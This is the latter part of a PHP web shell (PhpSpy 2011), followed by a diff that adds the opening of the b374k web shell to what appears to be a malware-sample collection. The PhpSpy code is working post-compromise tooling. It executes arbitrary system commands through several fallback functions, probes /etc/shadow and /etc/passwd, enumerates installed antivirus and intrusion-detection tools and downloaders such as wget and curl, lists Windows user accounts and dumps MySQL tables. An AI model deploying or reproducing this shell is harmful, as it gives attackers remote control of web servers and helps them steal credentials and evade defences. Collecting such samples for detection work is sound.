1380 makehide('action','file');
1381 makehide('dir',$nowpath);
1382 makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1383 p('<p>year:');
1384 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1385 p('month:');
1386 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1387 p('day:');
1388 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1389 p('hour:');
1390 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1391 p('minute:');
1392 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1393 p('second:');
1394 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1395 p('</p>');
1396 formfooter();
1397 goback();
1398}//end newtime
1399
1400elseif ($action == 'shell') {
1401 if (IS_WIN && IS_COM) {
1402 if($program && $parameter) {
1403 $shell= new COM('Shell.Application');
1404 $a = $shell->ShellExecute($program,$parameter);
1405 m('Program run has '.(!$a ? 'success' : 'fail'));
1406 }
1407 !$program && $program = 'c:\windows\system32\cmd.exe';
1408 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1409 formhead(array('title'=>'Execute Program'));
1410 makehide('action','shell');
1411 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1412 p('<p>');
1413 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1414 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1415 p('</p>');
1416 formfoot();
1417 }
1418 formhead(array('title'=>'Execute Command'));
1419 makehide('action','shell');
1420 if (IS_WIN && IS_COM) {
1421 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1422 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1423 }
1424 p('<p>');
1425 makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
1426 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1427 p('</p>');
1428 formfoot();
1429
1430 if ($command) {
1431 p('<hr width="100%" noshade /><pre>');
1432 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1433 $wsh = new COM('WScript.shell');
1434 $exec = $wsh->exec('cmd.exe /c '.$command);
1435 $stdout = $exec->StdOut();
1436 $stroutput = $stdout->ReadAll();
1437 echo $stroutput;
1438 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1439 $descriptorspec = array(
1440 0 => array('pipe', 'r'),
1441 1 => array('pipe', 'w'),
1442 2 => array('pipe', 'w')
1443 );
1444 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1445 if (is_resource($process)) {
1446 fwrite($pipes[0], $command."\r\n");
1447 fwrite($pipes[0], "exit\r\n");
1448 fclose($pipes[0]);
1449 while (!feof($pipes[1])) {
1450 echo fgets($pipes[1], 1024);
1451 }
1452 fclose($pipes[1]);
1453 while (!feof($pipes[2])) {
1454 echo fgets($pipes[2], 1024);
1455 }
1456 fclose($pipes[2]);
1457 proc_close($process);
1458 }
1459 } else {
1460 echo(execute($command));
1461 }
1462 p('</pre>');
1463 }
1464}//end shell
1465
1466elseif ($action == 'phpenv') {
1467 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1468 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1469 !$dis_func && $dis_func = 'No';
1470 $info = array(
1471 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1472 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1473 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1474 4 => array('Server OS',PHP_OS),
1475 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1476 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1477 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1478 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1479 9 => array('The file path',__FILE__),
1480
1481 10 => array('PHP Version',PHP_VERSION),
1482 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
1483 12 => array('Safe Mode',getcfg('safe_mode')),
1484 13 => array('Administrator',$adminmail),
1485 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1486 15 => array('enable_dl',getcfg('enable_dl')),
1487 16 => array('display_errors',getcfg('display_errors')),
1488 17 => array('register_globals',getcfg('register_globals')),
1489 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1490 19 => array('memory_limit',getcfg('memory_limit')),
1491 20 => array('post_max_size',getcfg('post_max_size')),
1492 21 => array('upload_max_filesize',$upsize),
1493 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1494 23 => array('disable_functions',$dis_func),
1495 );
1496
1497 if($phpvarname) {
1498 m($phpvarname .' : '.getcfg($phpvarname));
1499 }
1500
1501 formhead(array('title'=>'Server environment'));
1502 makehide('action','phpenv');
1503 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1504 formfooter();
1505
1506 $hp = array(0=> 'Server', 1=> 'PHP');
1507 for($a=0;$a<2;$a++) {
1508 p('<h2>'.$hp[$a].' &raquo;</h2>');
1509 p('<ul class="info">');
1510 if ($a==0) {
1511 for($i=1;$i<=9;$i++) {
1512 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1513 }
1514 } elseif ($a == 1) {
1515 for($i=10;$i<=23;$i++) {
1516 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1517 }
1518 }
1519 p('</ul>');
1520 }
1521}//end phpenv
1522
1523elseif ($action == 'secinfo') {
1524
1525 secparam('Server software', @getenv('SERVER_SOFTWARE'));
1526 secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
1527 secparam('Open base dir', @ini_get('open_basedir'));
1528 secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1529 secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1530 secparam('cURL support', function_exists('curl_version')?'enabled':'no');
1531 $temp=array();
1532 if(function_exists('mysql_get_client_info'))
1533 $temp[] = "MySql (".mysql_get_client_info().")";
1534 if(function_exists('mssql_connect'))
1535 $temp[] = "MSSQL";
1536 if(function_exists('pg_connect'))
1537 $temp[] = "PostgreSQL";
1538 if(function_exists('oci_connect'))
1539 $temp[] = "Oracle";
1540 secparam('Supported databases', implode(', ', $temp));
1541
1542 if( !IS_WIN ) {
1543 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1544 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1545 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1546 secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1547 secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1548 secparam('OS version', @file_get_contents('/proc/version'));
1549 secparam('Distr name', @file_get_contents('/etc/issue.net'));
1550 $safe_mode = @ini_get('safe_mode');
1551 if(!$GLOBALS['safe_mode']) {
1552 $temp=array();
1553 foreach ($userful as $item)
1554 if(which($item)){$temp[]=$item;}
1555 secparam('Userful', implode(', ',$temp));
1556 $temp=array();
1557 foreach ($danger as $item)
1558 if(which($item)){$temp[]=$item;}
1559 secparam('Danger', implode(', ',$temp));
1560 $temp=array();
1561 foreach ($downloaders as $item)
1562 if(which($item)){$temp[]=$item;}
1563 secparam('Downloaders', implode(', ',$temp));
1564 secparam('Hosts', @file_get_contents('/etc/hosts'));
1565 secparam('HDD space', execute('df -h'));
1566 secparam('Mount options', @file_get_contents('/etc/fstab'));
1567 }
1568 } else {
1569 secparam('OS Version',execute('ver'));
1570 secparam('Account Settings',execute('net accounts'));
1571 secparam('User Accounts',execute('net user'));
1572 secparam('IP Configurate',execute('ipconfig -all'));
1573 }
1574}//end
1575
1576else {
1577 m('Undefined Action');
1578}
1579
1580?>
1581</td></tr></table>
1582<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1583 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1584 Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
1585</div>
1586</body>
1587</html>
1588
1589<?php
1590
1591/*======================================================
1592º¯Êý¿â
1593======================================================*/
1594
1595function secparam($n, $v) {
1596 $v = trim($v);
1597 if($v) {
1598 p('<h2>'.$n.' &raquo;</h2>');
1599 p('<div class="infolist">');
1600 if(strpos($v, "\n") === false)
1601 p($v.'<br />');
1602 else
1603 p('<pre>'.$v.'</pre>');
1604 p('</div>');
1605 }
1606}
1607function m($msg) {
1608 echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1609 echo $msg;
1610 echo '</div>';
1611}
1612function scookie($key, $value, $life = 0, $prefix = 1) {
1613 global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1614 $key = ($prefix ? $cookiepre : '').$key;
1615 $life = $life ? $life : $cookielife;
1616 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1617 setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1618}
1619function multi($num, $perpage, $curpage, $tablename) {
1620 $multipage = '';
1621 if($num > $perpage) {
1622 $page = 10;
1623 $offset = 5;
1624 $pages = @ceil($num / $perpage);
1625 if($page > $pages) {
1626 $from = 1;
1627 $to = $pages;
1628 } else {
1629 $from = $curpage - $offset;
1630 $to = $curpage + $page - $offset - 1;
1631 if($from < 1) {
1632 $to = $curpage + 1 - $from;
1633 $from = 1;
1634 if(($to - $from) < $page && ($to - $from) < $pages) {
1635 $to = $page;
1636 }
1637 } elseif($to > $pages) {
1638 $from = $curpage - $pages + $to;
1639 $to = $pages;
1640 if(($to - $from) < $page && ($to - $from) < $pages) {
1641 $from = $pages - $page + 1;
1642 }
1643 }
1644 }
1645 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1646 for($i = $from; $i <= $to; $i++) {
1647 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1648 }
1649 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1650 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1651 }
1652 return $multipage;
1653}
1654// µÇ½Èë¿Ú
1655function loginpage() {
1656?>
1657 <style type="text/css">
1658 input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
1659 </style>
1660 <form method="POST" action="">
1661 <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
1662 <input type="hidden" name="action" value="login">
1663 <input type="submit" value="Login">
1664 </form>
1665<?php
1666 exit;
1667}//end loginpage()
1668
1669function execute($cfe) {
1670 $res = '';
1671 if ($cfe) {
1672 if(function_exists('system')) {
1673 @ob_start();
1674 @system($cfe);
1675 $res = @ob_get_contents();
1676 @ob_end_clean();
1677 } elseif(function_exists('passthru')) {
1678 @ob_start();
1679 @passthru($cfe);
1680 $res = @ob_get_contents();
1681 @ob_end_clean();
1682 } elseif(function_exists('shell_exec')) {
1683 $res = @shell_exec($cfe);
1684 } elseif(function_exists('exec')) {
1685 @exec($cfe,$res);
1686 $res = join("\n",$res);
1687 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1688 $res = '';
1689 while(!@feof($f)) {
1690 $res .= @fread($f,1024);
1691 }
1692 @pclose($f);
1693 }
1694 }
1695 return $res;
1696}
1697function which($pr) {
1698 $path = execute("which $pr");
1699 return ($path ? $path : $pr);
1700}
1701
1702function cf($fname,$text){
1703 if($fp=@fopen($fname,'w')) {
1704 @fputs($fp,@base64_decode($text));
1705 @fclose($fp);
1706 }
1707}
1708function dirsize($dir) {
1709 $dh = @opendir($dir);
1710 $size = 0;
1711 while($file = @readdir($dh)) {
1712 if ($file != '.' && $file != '..') {
1713 $path = $dir.'/'.$file;
1714 $size += @is_dir($path) ? dirsize($path) : @filesize($path);
1715 }
1716 }
1717 @closedir($dh);
1718 return $size;
1719}
1720// Ò³Ãæµ÷ÊÔÐÅÏ¢
1721function debuginfo() {
1722 global $starttime;
1723 $mtime = explode(' ', microtime());
1724 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1725 echo 'Processed in '.$totaltime.' second(s)';
1726}
1727
1728//Á¬½ÓMYSQLÊý¾Ý¿â
1729function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1730 global $charsetdb;
1731 @ini_set('mysql.connect_timeout', 5);
1732 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1733 p('<h2>Can not connect to MySQL server</h2>');
1734 exit;
1735 }
1736 if($link && $dbname) {
1737 if (!@mysql_select_db($dbname, $link)) {
1738 p('<h2>Database selected has error</h2>');
1739 exit;
1740 }
1741 }
1742 if($link && mysql_get_server_info() > '4.1') {
1743 if($charset && in_array(strtolower($charset), $charsetdb)) {
1744 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1745 }
1746 }
1747 return $link;
1748}
1749
1750// È¥µôתÒå×Ö·û
1751function s_array(&$array) {
1752 if (is_array($array)) {
1753 foreach ($array as $k => $v) {
1754 $array[$k] = s_array($v);
1755 }
1756 } else if (is_string($array)) {
1757 $array = stripslashes($array);
1758 }
1759 return $array;
1760}
1761
1762// Çå³ýHTML´úÂë
1763function html_clean($content) {
1764 $content = htmlspecialchars($content);
1765 $content = str_replace("\n", "<br />", $content);
1766 $content = str_replace(" ", "&nbsp;&nbsp;", $content);
1767 $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1768 return $content;
1769}
1770
1771// »ñȡȨÏÞ
1772function getChmod($filepath){
1773 return substr(base_convert(@fileperms($filepath),10,8),-4);
1774}
1775
1776function getPerms($filepath) {
1777 $mode = @fileperms($filepath);
1778 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1779 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1780 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1781 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1782 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1783 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1784 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1785 else {$type = '?';}
1786
1787 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1788 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1789 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1790 $group['read'] = ($mode & 00040) ? 'r' : '-';
1791 $group['write'] = ($mode & 00020) ? 'w' : '-';
1792 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1793 $world['read'] = ($mode & 00004) ? 'r' : '-';
1794 $world['write'] = ($mode & 00002) ? 'w' : '-';
1795 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1796
1797 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1798 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1799 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1800
1801 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1802}
1803
1804function getUser($filepath) {
1805 if (function_exists('posix_getpwuid')) {
1806 $array = @posix_getpwuid(@fileowner($filepath));
1807 if ($array && is_array($array)) {
1808 return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1809 }
1810 }
1811 return '';
1812}
1813
1814// ɾ³ýĿ¼
1815function deltree($deldir) {
1816 $mydir=@dir($deldir);
1817 while($file=$mydir->read()) {
1818 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1819 @chmod($deldir.'/'.$file,0777);
1820 deltree($deldir.'/'.$file);
1821 }
1822 if (is_file($deldir.'/'.$file)) {
1823 @chmod($deldir.'/'.$file,0777);
1824 @unlink($deldir.'/'.$file);
1825 }
1826 }
1827 $mydir->close();
1828 @chmod($deldir,0777);
1829 return @rmdir($deldir) ? 1 : 0;
1830}
1831
1832// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
1833function bg() {
1834 global $bgc;
1835 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1836}
1837
1838// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
1839function getPath($scriptpath, $nowpath) {
1840 if ($nowpath == '.') {
1841 $nowpath = $scriptpath;
1842 }
1843 $nowpath = str_replace('\\', '/', $nowpath);
1844 $nowpath = str_replace('//', '/', $nowpath);
1845 if (substr($nowpath, -1) != '/') {
1846 $nowpath = $nowpath.'/';
1847 }
1848 return $nowpath;
1849}
1850
1851// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
1852function getUpPath($nowpath) {
1853 $pathdb = explode('/', $nowpath);
1854 $num = count($pathdb);
1855 if ($num > 2) {
1856 unset($pathdb[$num-1],$pathdb[$num-2]);
1857 }
1858 $uppath = implode('/', $pathdb).'/';
1859 $uppath = str_replace('//', '/', $uppath);
1860 return $uppath;
1861}
1862
1863// ¼ì²éPHPÅäÖòÎÊý
1864function getcfg($varname) {
1865 $result = get_cfg_var($varname);
1866 if ($result == 0) {
1867 return 'No';
1868 } elseif ($result == 1) {
1869 return 'Yes';
1870 } else {
1871 return $result;
1872 }
1873}
1874
1875// ¼ì²éº¯ÊýÇé¿ö
1876function getfun($funName) {
1877 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1878}
1879
1880// »ñµÃÎļþÀ©Õ¹Ãû
1881function getext($file) {
1882 $info = pathinfo($file);
1883 return $info['extension'];
1884}
1885
1886function GetWDirList($dir){
1887 global $dirdata,$j,$nowpath;
1888 !$j && $j=1;
1889 if ($dh = opendir($dir)) {
1890 while ($file = readdir($dh)) {
1891 $f=str_replace('//','/',$dir.'/'.$file);
1892 if($file!='.' && $file!='..' && is_dir($f)){
1893 if (is_writable($f)) {
1894 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1895 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1896 $dirdata[$j]['dirchmod']=getChmod($f);
1897 $dirdata[$j]['dirperm']=getPerms($f);
1898 $dirdata[$j]['dirlink']=$dir;
1899 $dirdata[$j]['server_link']=$f;
1900 $j++;
1901 }
1902 GetWDirList($f);
1903 }
1904 }
1905 closedir($dh);
1906 clearstatcache();
1907 return $dirdata;
1908 } else {
1909 return array();
1910 }
1911}
1912
1913function GetWFileList($dir){
1914 global $filedata,$j,$nowpath, $writabledb;
1915 !$j && $j=1;
1916 if ($dh = opendir($dir)) {
1917 while ($file = readdir($dh)) {
1918 $ext = getext($file);
1919 $f=str_replace('//','/',$dir.'/'.$file);
1920 if($file!='.' && $file!='..' && is_dir($f)){
1921 GetWFileList($f);
1922 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1923 if (is_writable($f)) {
1924 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1925 $filedata[$j]['size']=sizecount(@filesize($f));
1926 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1927 $filedata[$j]['filechmod']=getChmod($f);
1928 $filedata[$j]['fileperm']=getPerms($f);
1929 $filedata[$j]['fileowner']=getUser($f);
1930 $filedata[$j]['dirlink']=$dir;
1931 $filedata[$j]['server_link']=$f;
1932 $j++;
1933 }
1934 }
1935 }
1936 closedir($dh);
1937 clearstatcache();
1938 return $filedata;
1939 } else {
1940 return array();
1941 }
1942}
1943
1944function GetSFileList($dir, $content, $re = 0) {
1945 global $filedata,$j,$nowpath, $writabledb;
1946 !$j && $j=1;
1947 if ($dh = opendir($dir)) {
1948 while ($file = readdir($dh)) {
1949 $ext = getext($file);
1950 $f=str_replace('//','/',$dir.'/'.$file);
1951 if($file!='.' && $file!='..' && is_dir($f)){
1952 GetSFileList($f, $content, $re = 0);
1953 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1954 $find = 0;
1955 if ($re) {
1956 if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
1957 $find = 1;
1958 }
1959 } else {
1960 if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
1961 $find = 1;
1962 }
1963 }
1964 if ($find) {
1965 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1966 $filedata[$j]['size']=sizecount(@filesize($f));
1967 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1968 $filedata[$j]['filechmod']=getChmod($f);
1969 $filedata[$j]['fileperm']=getPerms($f);
1970 $filedata[$j]['fileowner']=getUser($f);
1971 $filedata[$j]['dirlink']=$dir;
1972 $filedata[$j]['server_link']=$f;
1973 $j++;
1974 }
1975 }
1976 }
1977 closedir($dh);
1978 clearstatcache();
1979 return $filedata;
1980 } else {
1981 return array();
1982 }
1983}
1984
1985function qy($sql) {
1986 global $mysqllink;
1987 //echo $sql.'<br>';
1988 $res = $error = '';
1989 if(!$res = @mysql_query($sql,$mysqllink)) {
1990 return 0;
1991 } else if(is_resource($res)) {
1992 return 1;
1993 } else {
1994 return 2;
1995 }
1996 return 0;
1997}
1998
1999function q($sql) {
2000 global $mysqllink;
2001 return @mysql_query($sql,$mysqllink);
2002}
2003
2004function fr($qy){
2005 mysql_free_result($qy);
2006}
2007
2008function sizecount($fileSize) {
2009 $size = sprintf("%u", $fileSize);
2010 if($size == 0) {
2011 return '0 Bytes' ;
2012 }
2013 $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
2014 return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
2015}
2016// ±¸·ÝÊý¾Ý¿â
2017function sqldumptable($table, $fp=0) {
2018 global $mysqllink;
2019
2020 $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
2021 $res = q("SHOW CREATE TABLE $table");
2022 $create = mysql_fetch_row($res);
2023 $tabledump .= $create[1].";\n\n";
2024
2025 if ($fp) {
2026 fwrite($fp,$tabledump);
2027 } else {
2028 echo $tabledump;
2029 }
2030 $tabledump = '';
2031 $rows = q("SELECT * FROM $table");
2032 while ($row = mysql_fetch_assoc($rows)) {
2033 foreach($row as $k=>$v) {
2034 $row[$k] = "'".@mysql_real_escape_string($v)."'";
2035 }
2036 $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
2037 if ($fp) {
2038 fwrite($fp,$tabledump);
2039 } else {
2040 echo $tabledump;
2041 }
2042 }
2043 fwrite($fp,"\n\n");
2044 fr($rows);
2045}
2046
2047function p($str){
2048 echo $str."\n";
2049}
2050
2051function tbhead() {
2052 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2053}
2054function tbfoot(){
2055 p('</table>');
2056}
2057
2058function makehide($name,$value=''){
2059 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2060}
2061
2062function makeinput($arg = array()){
2063 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2064 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2065 !$arg['type'] && $arg['type'] = 'text';
2066 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2067 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2068 if ($arg['newline']) {
2069 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2070 } else {
2071 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2072 }
2073}
2074
2075function makeselect($arg = array()){
2076 if ($arg['onchange']) {
2077 $onchange = 'onchange="'.$arg['onchange'].'"';
2078 }
2079 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2080 if ($arg['newline']) p('<p>');
2081 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2082 if (is_array($arg['option'])) {
2083 if ($arg['nokey']) {
2084 foreach ($arg['option'] as $value) {
2085 if ($arg['selected']==$value) {
2086 p("<option value=\"$value\" selected>$value</option>");
2087 } else {
2088 p("<option value=\"$value\">$value</option>");
2089 }
2090 }
2091 } else {
2092 foreach ($arg['option'] as $key=>$value) {
2093 if ($arg['selected']==$key) {
2094 p("<option value=\"$key\" selected>$value</option>");
2095 } else {
2096 p("<option value=\"$key\">$value</option>");
2097 }
2098 }
2099 }
2100 }
2101 p("</select>");
2102 if ($arg['newline']) p('</p>');
2103}
2104function formhead($arg = array()) {
2105 global $self;
2106 !$arg['method'] && $arg['method'] = 'post';
2107 !$arg['action'] && $arg['action'] = $self;
2108 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2109 !$arg['name'] && $arg['name'] = 'form1';
2110 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2111 if ($arg['title']) {
2112 p('<h2>'.$arg['title'].' &raquo;</h2>');
2113 }
2114}
2115
2116function maketext($arg = array()){
2117 !$arg['cols'] && $arg['cols'] = 100;
2118 !$arg['rows'] && $arg['rows'] = 25;
2119 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2120 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2121}
2122
2123function formfooter($name = ''){
2124 !$name && $name = 'submit';
2125 p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
2126 p('</form>');
2127}
2128
2129function goback(){
2130 global $self, $nowpath;
2131 p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
2132}
2133
2134function formfoot(){
2135 p('</form>');
2136}
2137
2138function encode_pass($pass) {
2139 $pass = md5('angel'.$pass);
2140 $pass = md5($pass.'angel');
2141 $pass = md5('angel'.$pass.'angel');
2142 return $pass;
2143}
2144
2145function pr($s){
2146 echo "<pre>".print_r($s).'</pre>';
2147}
2148
2149?>
diff --git a/data/samples/classic/b374k.php b/data/samples/classic/b374k.php
new file mode 100644
index 0000000..a448645
--- /dev/null
+++ b/data/samples/classic/b374k.php
@@ -0,0 +1,10 @@
1<?php
2/*
3 b374k shell 3.2.3
4 Jayalah Indonesiaku
5 (c)2014
6 https://github.com/b374k/b374k
7
8*/
9$GLOBALS['pass'] = "fb621f5060b9f65acf8eb4232e3024140dea2b34"; // sha1(md5('b374k'))
